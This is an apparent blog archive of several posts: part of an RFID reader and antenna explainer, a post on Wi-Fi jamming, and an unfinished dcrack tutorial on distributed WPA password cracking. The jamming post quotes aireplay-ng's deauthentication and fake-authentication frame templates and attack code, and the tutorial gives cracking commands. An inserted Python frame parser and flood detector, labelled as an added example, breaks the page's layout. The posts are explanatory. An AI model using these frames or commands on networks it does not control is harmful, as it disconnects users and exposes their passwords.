<span class="Apple-tab-span" style="white-space: pre;"> </span>Tags that have only a single antenna are not as reliable as tags with multiple antennas. With a single antenna, a tag's orientation can result in “dead zones”, or areas on the tag where incoming signals cannot be easily harvested to provide sufficient energy to power on the chip and communicate with the reader. A tag with dual antennas is able to eliminate these dead zones and increase its readability but requires a specialized chip.</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: x-large;">RFID Readers</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<a href="http://3.bp.blogspot.com/-NMBIShZReuE/VVGaccRjU0I/AAAAAAAACSE/mur9MAOW_Z4/s1600/10132057-long-range-uhf-rfid-reader-dl910.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" height="243" src="http://3.bp.blogspot.com/-NMBIShZReuE/VVGaccRjU0I/AAAAAAAACSE/mur9MAOW_Z4/s320/10132057-long-range-uhf-rfid-reader-dl910.jpg" width="320" /></a><span class="Apple-tab-span" style="white-space: pre;"></span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span"> </span>An RFID reader, also known as an interrogator, is a device that provides the connection between the tag data and the enterprise system software that needs the information. The reader communicates with tags that are within its field of operation, performing any number of tasks including simple continuous inventorying, filtering (searching for tags that meet certain criteria), writing (or encoding) to selected tags, etc.</div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The reader uses an attached antenna to capture data from tags. It then passes the data to a computer for processing. Just like RFID tags, there are many different sizes and types of RFID readers. Readers can be affixed in a stationary position in a store or factory, or integrated into a mobile device such as a portable, handheld scanner. Readers can also be embedded in electronic equipment or devices, and in vehicles.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><span style="font-size: large;">Reader Antennas</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>RFID readers and reader antennas work together to read tags. Reader antennas convert electrical current into electromagnetic waves that are then radiated into space where they can be received by a tag antenna and converted back to electrical current. Just like tag antennas, there is a large variety of reader antennas and optimal antenna selection varies according to the solution's specific application and environment.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>The two most common antenna types are <b>linear</b>- and <b>circular-polarized</b> antennas. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Antennas that radiate linear electric fields have long ranges, and high levels of power that enable their signals to penetrate through different materials to read tags. Linear antennas are sensitive to tag orientation; depending on the tag angle or placement, linear antennas can have a difficult time reading tags. Conversely, antennas that radiate circular fields are less sensitive to orientation, but are not able to deliver as much power as linear antennas.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="background-color: white; padding: 0px;">
<a href="http://1.bp.blogspot.com/-CKuOKD52b4Q/VVGedfcWh6I/AAAAAAAACSQ/N1jrix2caKg/s1600/linear-polarization-horizontal.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" src="http://1.bp.blogspot.com/-CKuOKD52b4Q/VVGedfcWh6I/AAAAAAAACSQ/N1jrix2caKg/s1600/linear-polarization-horizontal.png" /></a><span style="font-family: inherit;"></span></div>
<div style="text-align: justify;">
<span style="font-family: inherit;"><span style="line-height: 25px;">Linear polarization occurs when electromagnetic waves broadcast on a single plane (either vertical or horizontal). Linear polarized antennas must have a known RFID tag orientation and the RFID tag must be fixed upon the same plane as the antenna in order to get a consistent read. Some examples of linear polarized antennas are the <b>MTI MT-263003 Outdoor Antenna</b>, and the <b>Times-7 A5531 Indoor Antenna</b>. Due to the concentrated emission, linear polarized antennas typically have greater read range than circular polarized antennas of the same gain.</span></span></div>
<br />
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Circular polarized antennas, such as the <b>Laird S9028PCR Indoor RFID Antenna</b> and the <b>MTI MT-242043 Outdoor RFID Antenna</b>, emit electromagnetic fields in a corkscrew-like fashion. Technically speaking, they are broadcasting electromagnetic waves on two planes making one complete revolution in a single wavelength. Compared to linear polarized antennas, circular polarized antennas lose about 3 dB per read because they split their power across two separate planes.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<a href="http://2.bp.blogspot.com/-JIH_ifQllsA/VVGfZ2zIs_I/AAAAAAAACSY/oMkGH6Pnh28/s1600/right-hand-circular-polarization.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-JIH_ifQllsA/VVGfZ2zIs_I/AAAAAAAACSY/oMkGH6Pnh28/s1600/right-hand-circular-polarization.png" /></a><span class="Apple-tab-span" style="white-space: pre;"> </span>Choice of antenna is also determined by the distance between the RFID reader and the tags that it needs to read. <b>This distance is called read range</b>. Reader antennas operate in either a "near-field" (short range) or "far-field" (long range). <b>In</b> <b>near-field applications</b>, the read range is <b>less than 30 cm</b> and the antenna uses magnetic coupling so the reader and tag can transfer power. In near-field systems, the readability of the tags is not affected by the presence of dielectrics such as water and metal in the field.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b>In far-field applications</b>, the range between the tag and reader is <b>greater than 30 cm</b> and can be up to several tens of meters. Far-field antennas utilize electromagnetic coupling and dielectrics can weaken communication between the reader and tags.</div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><br />
<span style="font-size: large;">Reader Control and Application Software</span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span>Reader control and application software, also known as middleware, helps connect RFID readers with the applications they support. The middleware sends control commands to the reader and receives tag data from the reader.</div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: justify;">
Reference: (See the next part)</div>
Abyss Zircanavo, 2013-10-30: WIRELESS JAMMING !!<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>What is jamming?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">Jamming is any attack that denies service to legitimate users by generating noise, fake protocol packets, or legitimate packets sent with spurious timing. A particular class of Denial of Service (DoS) attacks is also considered jamming. </span><span style="color: #674ea7;">The most trivial way of disrupting a wireless network is to generate continuous high-power noise across the entire bandwidth near the transmitting and/or receiving nodes. The device that generates such noise is called a <i>Jammer</i> and the process is called <i>Jamming</i>. </span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">However, jamming can be made more energy efficient and less detectable if the jammer operates using knowledge of the protocol. Jammers that jam the network using knowledge of the protocol are termed <i><b>protocol aware jammers</b></i>. </span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">The Wireless Signal Jammer Device can be used to temporarily stop transmission, temporarily short out or turn off the power during the usage of units. These include Radios, Televisions, Microwaves, or any unit that receives electrical signals for operation.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Is Wireless network secured enough from Jamming?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b><span style="color: #674ea7;">NO</span></b></div>
<div style="text-align: center;">
<span style="color: #674ea7;"><br /></span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">Since the ratification of the IEEE 802.11i in 2004, organisations have been able to improve security on their wireless networks by making use of CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code protocol). CCMP uses AES (Advanced Encryption Standard) as opposed to the RC4 streaming cipher found in implementations of WEP (Wired Equivalent Privacy) and TKIP (Temporal Key Integrity Protocol). However, the protection offered by 802.11i applies only to data frames and does not provide any protection over the management frames.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Why am I talking about "Management Frames"?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">It is these management frames that are insecure and can lead to DoS attacks against an organisation’s wireless network. Unencrypted management frames can disclose important pieces of information to an attacker, including details about the type of wireless equipment in use on the wireless network and configuration settings.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>What are Management Frames?</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">802.11 management frames enable stations to establish and maintain communications. Management packets are used to support authentication, association, and synchronization.</span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Layer 2 DoS (Jamming using Layer 2 [protocol aware jamming] )</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">On an 802.11 network, an attacker can transmit packets using a spoofed source MAC address of an access point. The recipient of these spoofed frames has no way of telling if they are legitimate or illegitimate requests and will process them. The ability to transmit spoofed management frames allows MAC layer DoS attacks to take place. </span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: orange; font-size: large;"><b>Two such MAC layer attacks are :</b></span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"> </span><b><span style="color: #cc0000;">Authentication/Association flood attack</span></b><span style="color: #674ea7;"> : During the authentication/association flood attack, an attacker uses spoofed source MAC addresses that attempt to authenticate and associate to a target access point. The attacker repeatedly makes authentication/association requests, eventually exhausting the memory and processing capacity of the access point leaving clients with little or no connection to the wireless network.</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span></div>
<div style="text-align: center;">
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Authentication Packet</b> : Authentication packets are sent back and forth between the station requesting authentication and the station to which it is attempting to assert its authentic identity. The number of packets exchanged depends on the authentication method employed. Information relating to the particular scheme is carried in the body of the Authentication packet.</span></div>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>The aireplay-ng source-code defining the Authentication request [Line no. 88 (aireplay-ng.c)]</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #38761d;"><b>#define AUTH_REQ \
"\xB0\x00\x3A\x01\xBB\xBB\xBB\xBB\xBB\xBB\xCC\xCC\xCC\xCC\xCC\xCC" \
"\xBB\xBB\xBB\xBB\xBB\xBB\xB0\x00\x00\x00\x01\x00\x00\x00"</b></span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"><br /></span></span>
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Function(aireplay-ng.c)</b> : do_attack_fake_auth()</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Sample code for "-1" option in aireplay-ng</span><br />
<br />
<span style="color: #674ea7;"> </span><b><span style="color: #38761d;">else if(i==1) </span><span style="color: #b45f06;">//attack -1 (open)</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> {</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211, AUTH_REQ, 30 ); </span><span style="color: #b45f06;">//Authentication request data</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211 + 4, opt.f_dmac, 6 );</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211 + 10, opt.f_smac , 6 );</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> memcpy( h80211 + 16, opt.f_bssid, 6 );</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> opt.f_iswep = 0;</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> opt.f_tods = 0; opt.f_fromds = 0;</span><span style="color: #b45f06;"> // Not Leaving DS</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> opt.f_minlen = opt.f_maxlen = 30;</span><br /><span class="Apple-tab-span" style="color: #38761d; white-space: pre;"> </span><span style="color: #38761d;"> }</span></b><br />
<span style="color: #674ea7;"><br /></span>
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Tools</b> : Void11, mdk3, aireplay-ng, etc.</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<div style="text-align: center;">
<span class="Apple-tab-span" style="color: #674ea7; white-space: pre;"> </span><b><span style="color: #cc0000;">Deauthentication/Disassociation flood attacks</span></b><span style="color: #674ea7;"> : In a deauthentication/disassociation flood attack, an attacker transmits spoofed frames with the source address of the access point. When the recipient receives the frames, they will disconnect from the network and attempt to reconnect. If the attack is sustained, the clients will be unable to maintain a connection to the wireless network. The deauthentication/disassociation flood attack targets one or all users on a specific BSSID (MAC address of the access point).</span></div>
<div style="text-align: center;">
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span></div>
<div style="text-align: center;">
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Deauthentication Packet</b> : This packet is an announcement stating that the receiver is no longer authenticated. It is a one-way communication from the authenticating station (a BSS or functional equivalent), and <b><span style="font-size: large;">must be accepted</span></b>. It takes effect immediately.</span></div>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>The aireplay-ng source-code defining the Deauthentication request [Line no. 84 (aireplay-ng.c)]</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<b><span style="color: #38761d;">#define DEAUTH_REQ \</span></b><br />
<blockquote class="tr_bq">
<b><span style="color: #38761d;">"\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \<br />"\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"</span></b><span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><span class="Apple-tab-span" style="white-space: pre;"> </span></span></blockquote>
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Function(aireplay-ng.c)</b> : do_attack_deauth()</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Sample code for "-0" option in aireplay-ng</span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><br />
<span class="Apple-tab-span" style="color: #674ea7; white-space: pre;"> </span><b><span style="color: #38761d;">if(i==0) </span><span style="color: #b45f06;">//attack -0</span></b><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> {</b></span><br />
<b><span style="color: #38761d;"><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211, DEAUTH_REQ, 26 ); </span><span style="color: #b45f06;">// Deauthentication data</span></b><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211 + 16, opt.f_bssid, 6 ); </b></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211 + 4, opt.f_dmac, 6 ); </b></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> memcpy( h80211 + 10, opt.f_smac, 6 ); </b></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #38761d;"><b> </b></span></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> opt.f_iswep = 0;</b></span><br />
<b><span style="color: #38761d;"><span class="Apple-tab-span" style="white-space: pre;"> </span> opt.f_tods = 0; opt.f_fromds = 0; </span><span style="color: #b45f06;">// Not Leaving DS</span></b><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> opt.f_minlen = opt.f_maxlen = 26; </b></span><br />
<span style="color: #38761d;"><b><span class="Apple-tab-span" style="white-space: pre;"> </span> }</b></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"><b> </b></span></span><br />
<span class="Apple-tab-span" style="white-space: pre;"><span style="color: #674ea7;"> </span></span><br />
<span style="color: #674ea7;"><span class="Apple-tab-span" style="white-space: pre;"> </span><b>Tools</b> : file2air, mdk3, aireplay-ng, etc.</span><br />
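As an added example (not part of the post and not aireplay-ng code), here is a small Python decoder for the 802.11 management-frame header that the two templates above define, followed by a rate-based detector that flags the authentication/association and deauthentication/disassociation floods described in this section when run over a constructed sample timeline. The MAC addresses, window and threshold are made up; the address helper only mirrors the quoted memcpy() layout to build test input.

```python
import struct
from collections import defaultdict, deque

# The two frame templates quoted from aireplay-ng.c above, re-entered here as bytes.
AUTH_REQ = bytes.fromhex("B0003A01" + "BB" * 6 + "CC" * 6 + "BB" * 6 + "B000" + "000001000000")
DEAUTH_REQ = bytes.fromhex("C0003A01" + "CC" * 6 + "BB" * 6 + "BB" * 6 + "0000" + "0700")

# Management-frame subtypes (frame-control type 0); the names are our own labels.
MGMT_SUBTYPES = {
    0: "association-request", 1: "association-response",
    2: "reassociation-request", 3: "reassociation-response",
    4: "probe-request", 5: "probe-response", 8: "beacon",
    10: "disassociation", 11: "authentication", 12: "deauthentication", 13: "action",
}


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_mgmt_frame(frame: bytes) -> dict:
    """Decode the 24-byte 802.11 header plus the fixed fields of auth/deauth/disassoc bodies."""
    if len(frame) < 24:
        raise ValueError("truncated 802.11 header")
    fc, duration = struct.unpack_from("<HH", frame, 0)
    version, ftype, subtype, flags = fc & 0x3, (fc >> 2) & 0x3, (fc >> 4) & 0xF, fc >> 8
    if version != 0 or ftype != 0:
        raise ValueError("not a management frame")
    (seq_ctl,) = struct.unpack_from("<H", frame, 22)
    body = frame[24:]
    info = {
        "subtype": MGMT_SUBTYPES.get(subtype, f"reserved-{subtype}"),
        "duration": duration,
        "to_ds": bool(flags & 0x01), "from_ds": bool(flags & 0x02),
        "protected": bool(flags & 0x40),        # set on 802.11w-protected management frames
        "receiver": mac_str(frame[4:10]),        # addr1: the byte range written from opt.f_dmac
        "transmitter": mac_str(frame[10:16]),    # addr2: written from opt.f_smac
        "bssid": mac_str(frame[16:22]),          # addr3: written from opt.f_bssid
        "seq": seq_ctl >> 4, "frag": seq_ctl & 0xF,
    }
    if subtype in (10, 12) and len(body) >= 2:   # disassoc/deauth: 2-byte reason code
        (info["reason"],) = struct.unpack_from("<H", body, 0)
    elif subtype == 11 and len(body) >= 6:       # auth: algorithm, sequence number, status
        info["auth_alg"], info["auth_seq"], info["status"] = struct.unpack_from("<HHH", body, 0)
    return info


def detect_floods(events, window=1.0, threshold=20):
    """events: iterable of (timestamp_seconds, raw_frame) in time order.

    Auth/association requests are counted per *target* (receiver), because that flood uses
    many spoofed source MACs; deauth/disassoc are counted per *claimed sender* (transmitter),
    because that flood spoofs the access point's address. The content of a spoofed frame is
    indistinguishable from a real one, so only the rate is used. One alert per key per crossing.
    """
    recent = defaultdict(deque)
    alerted = set()
    alerts = []
    for ts, raw in events:
        try:
            f = parse_mgmt_frame(raw)
        except ValueError:
            continue
        if f["subtype"] in ("authentication", "association-request"):
            key = ("to", f["receiver"], f["subtype"])
        elif f["subtype"] in ("deauthentication", "disassociation"):
            key = ("from", f["transmitter"], f["subtype"])
        else:
            continue
        q = recent[key]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) >= threshold and key not in alerted:
            alerted.add(key)
            alerts.append({"time": ts, "address": key[1], "subtype": f["subtype"], "count": len(q)})
        elif len(q) < threshold:
            alerted.discard(key)
    return alerts


def fill_addresses(template: bytes, dst: bytes, src: bytes, bssid: bytes) -> bytes:
    """Mirror of the three memcpy() calls quoted above; used here only to build sample input."""
    f = bytearray(template)
    f[4:10], f[10:16], f[16:22] = dst, src, bssid
    return bytes(f)


def sample_capture():
    """Constructed (not captured) timeline of (timestamp, frame); all addresses are fictitious."""
    ap = bytes.fromhex("0200000000aa")       # locally administered, made-up AP address
    client = bytes.fromhex("020000000001")   # made-up station address
    bcast = b"\xff" * 6
    events = [
        (0.0, fill_addresses(DEAUTH_REQ, client, ap, ap)),    # two ordinary deauths from the AP,
        (30.0, fill_addresses(DEAUTH_REQ, client, ap, ap)),   # half a minute apart: not a flood
    ]
    # 60 broadcast deauths in 0.6 s carrying the AP's address: the deauth flood pattern
    events += [(60.0 + i * 0.01, fill_addresses(DEAUTH_REQ, bcast, ap, ap)) for i in range(60)]
    # 40 auth requests in 0.4 s, each from a different spoofed station MAC: the auth flood pattern
    events += [(120.0 + i * 0.01, fill_addresses(AUTH_REQ, ap, bytes.fromhex("02000000%04x" % (0x1000 + i)), ap))
               for i in range(40)]
    return events


if __name__ == "__main__":
    print(parse_mgmt_frame(AUTH_REQ))
    print(parse_mgmt_frame(DEAUTH_REQ))
    for a in detect_floods(sample_capture()):
        print(f"{a['time']:7.2f}s  {a['subtype']:<16} {a['address']}  {a['count']} frames in 1 s")
```

On the sample timeline the two ordinary deauths never cross the threshold, while the deauth burst and the auth burst each raise exactly one alert.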
<br />
<div style="text-align: center;">
<span style="color: orange; font-size: x-large;"><b>Layer 1 DoS (jamming using Layer 1 [RF Noise Jamming] )</b></span></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<span style="color: #674ea7;">A physical layer attack on a wireless network typically requires the attacker to be inside or very close to the target wireless network. Any network that relies on a shared medium is subject to DoS attacks from other devices sharing the same medium. When one device saturates the medium, other clients will find it difficult to communicate. </span></div>
<div style="text-align: center;">
<span style="color: #674ea7;">An attacker using a laptop equipped with a high output wireless client card and a high gain antenna can launch a physical medium attack on an organisation’s wireless network by generating enough RF noise to reduce the signal-to-noise ratio to an unusable level by saturating the 802.11 frequency bands. The jamming device could also be a custom built transmitter. For example, a Power Signal Generator (PSG) that is used to test antennas, cables and connectors for wireless devices can be turned into a wireless jamming device, when connected to a high gain antenna. </span></div>
<div style="text-align: center;">
<br /><br /><div style="text-align: justify;">
Phew !!<br />Finally it's over. I hope you all like it :-)</div>
<br />Sources and references:<br /><a href="http://networking.ncsu.edu/ThuenteMilcom06_FINAL.pdf">http://networking.ncsu.edu/ThuenteMilcom06_FINAL.pdf</a><br /><a href="http://www.wildpackets.com/resources/compendium/wireless_lan/wlan_packet_types">http://www.wildpackets.com/resources/compendium/wireless_lan/wlan_packet_types</a><br /><a href="https://supportforums.cisco.com/docs/DOC-24651">https://supportforums.cisco.com/docs/DOC-24651</a><br /><a href="http://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108">http://www.sans.org/reading-room/whitepapers/wireless/80211-denial-service-attacks-mitigation-2108</a><br />Wikipedia</div>
Abyss Zircanavo, 2013-07-17: DCRACK - DISTRIBUTED WIRELESS PASSWORD CRACKING<br />
<div style="text-align: center;">
Hello guys,</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
With the New Update from <a href="http://www.aircrack-ng.org/">Aircrack-Suite</a>, it's now possible to use other systems for the processing power.</div>
<div style="text-align: center;">
(I know that CPU cracking is an old school technique but this tool is really fun :P)</div>
<div style="text-align: center;">
With the new tool introduced in the aircrack suite, <b>dcrack</b> has the ability to perform Wireless Password Cracking in a Distributed Computing Environment. Isn't it COOL !! :D</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
OK then, let's see how we can work with <b>dcrack</b>. (I just tried it now but I think it's an AWESOME tool !! )</div>
<br />
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Note: I did not test this in a Fully Functioning Lab, I did the testing on VMware Workstation with 4 OS Running ( 1 User, 1 Server, 2 Clients).</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<br />
<div style="text-align: center;">
STEP 1 - INSTALL AIRCRACK SUITE</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
Just refer to the aircrack website (<a href="http://www.aircrack-ng.org/install.html">http://www.aircrack-ng.org/install.html</a>) for this.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
STEP 2 - RUN DCRACK</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
To run <b>dcrack</b>, you need to understand how <b>dcrack</b> works. </div>
<div style="text-align: center;">
<br /></div>
<a href="http://3.bp.blogspot.com/-W40rd3Yh4Zo/UeapM6tQBTI/AAAAAAAAAUA/JBHpgq9sYNk/s1600/dcrack.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" src="http://3.bp.blogspot.com/-W40rd3Yh4Zo/UeapM6tQBTI/AAAAAAAAAUA/JBHpgq9sYNk/s1600/dcrack.png" /></a><br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
As we know now, <b>dcrack</b> utilizes the concept of Distributed Computing, so <b>dcrack</b> needs three things :</div>
<div style="text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><b>A User</b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
The User requests the server to crack the wireless password for him/her. The user will send the ".cap" file and a dictionary file (wordlist) to the server for cracking.</div>
<br />
<div style="text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><b>A Server</b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
The server will be used as a Command Center. All the instructions, related to cracking will be given from here. The server will process the user's request for cracking and pass the instructions to the Clients.</div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<b></b><br />
<div style="text-align: center;">
<b><b>Clients</b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
Clients are responsible for doing the dirty work !!</div>
<div style="text-align: center;">
They use their processing power to crack the password using the wordlist given by the User.</div>
<br />
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
To run <b>dcrack</b>, we need to go to the location where <b>dcrack</b> is located. so now in the terminal we'll go to :</div>
<blockquote class="tr_bq" style="text-align: center;">
<b>/pentest/wireless/aircrack-ng/scripts/</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<b>First</b>, the server needs to be started. Run the command given below to start the <b>dcrack</b> server. </div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py server</b></blockquote>
<div style="text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-12a0Xz773_4/Ueaw2FibwCI/AAAAAAAAAUQ/t0mcCF3leWw/s1600/dcrack-server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-12a0Xz773_4/Ueaw2FibwCI/AAAAAAAAAUQ/t0mcCF3leWw/s1600/dcrack-server.png" /></a></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
<br /></div>
<div style="text-align: center;">
-------------------------------------------------</div>
<br />
<div style="text-align: center;">
NOTE:</div>
<b></b><br />
<div style="text-align: center;">
<b><br /></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
<b><b><span style="color: purple;">DCRACK SERVER IP : 192.168.1.128</span></b></b></div>
<b>
</b>
<br />
<div style="text-align: center;">
<b><span style="color: purple;">CLIENT 1 IP: 192.168.1.131</span></b></div>
<div style="text-align: center;">
<b><span style="color: purple;">CLIENT 2 IP: 192.168.1.133</span></b></div>
<div style="text-align: center;">
<b><span style="color: purple;">USER IP : 192.168.1.132</span></b></div>
<div style="text-align: center;">
<span style="color: purple;"><b>MAC ADDR OF THE AP : </b><b>00:0d:93:eb:b0:8c</b></span></div>
<div style="text-align: center;">
<b>-----------------------------------------------------------</b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b><br /></b></div>
<div style="text-align: center;">
<b>Second</b>, the user needs to send the .cap file and the wordlist for the cracking to the server.</div>
<blockquote class="tr_bq" style="text-align: center;">
<b>python dcrack.py cmd 192.168.1.128 cap /root/test.cap</b></blockquote>
<blockquote class="tr_bq" style="text-align: center;">
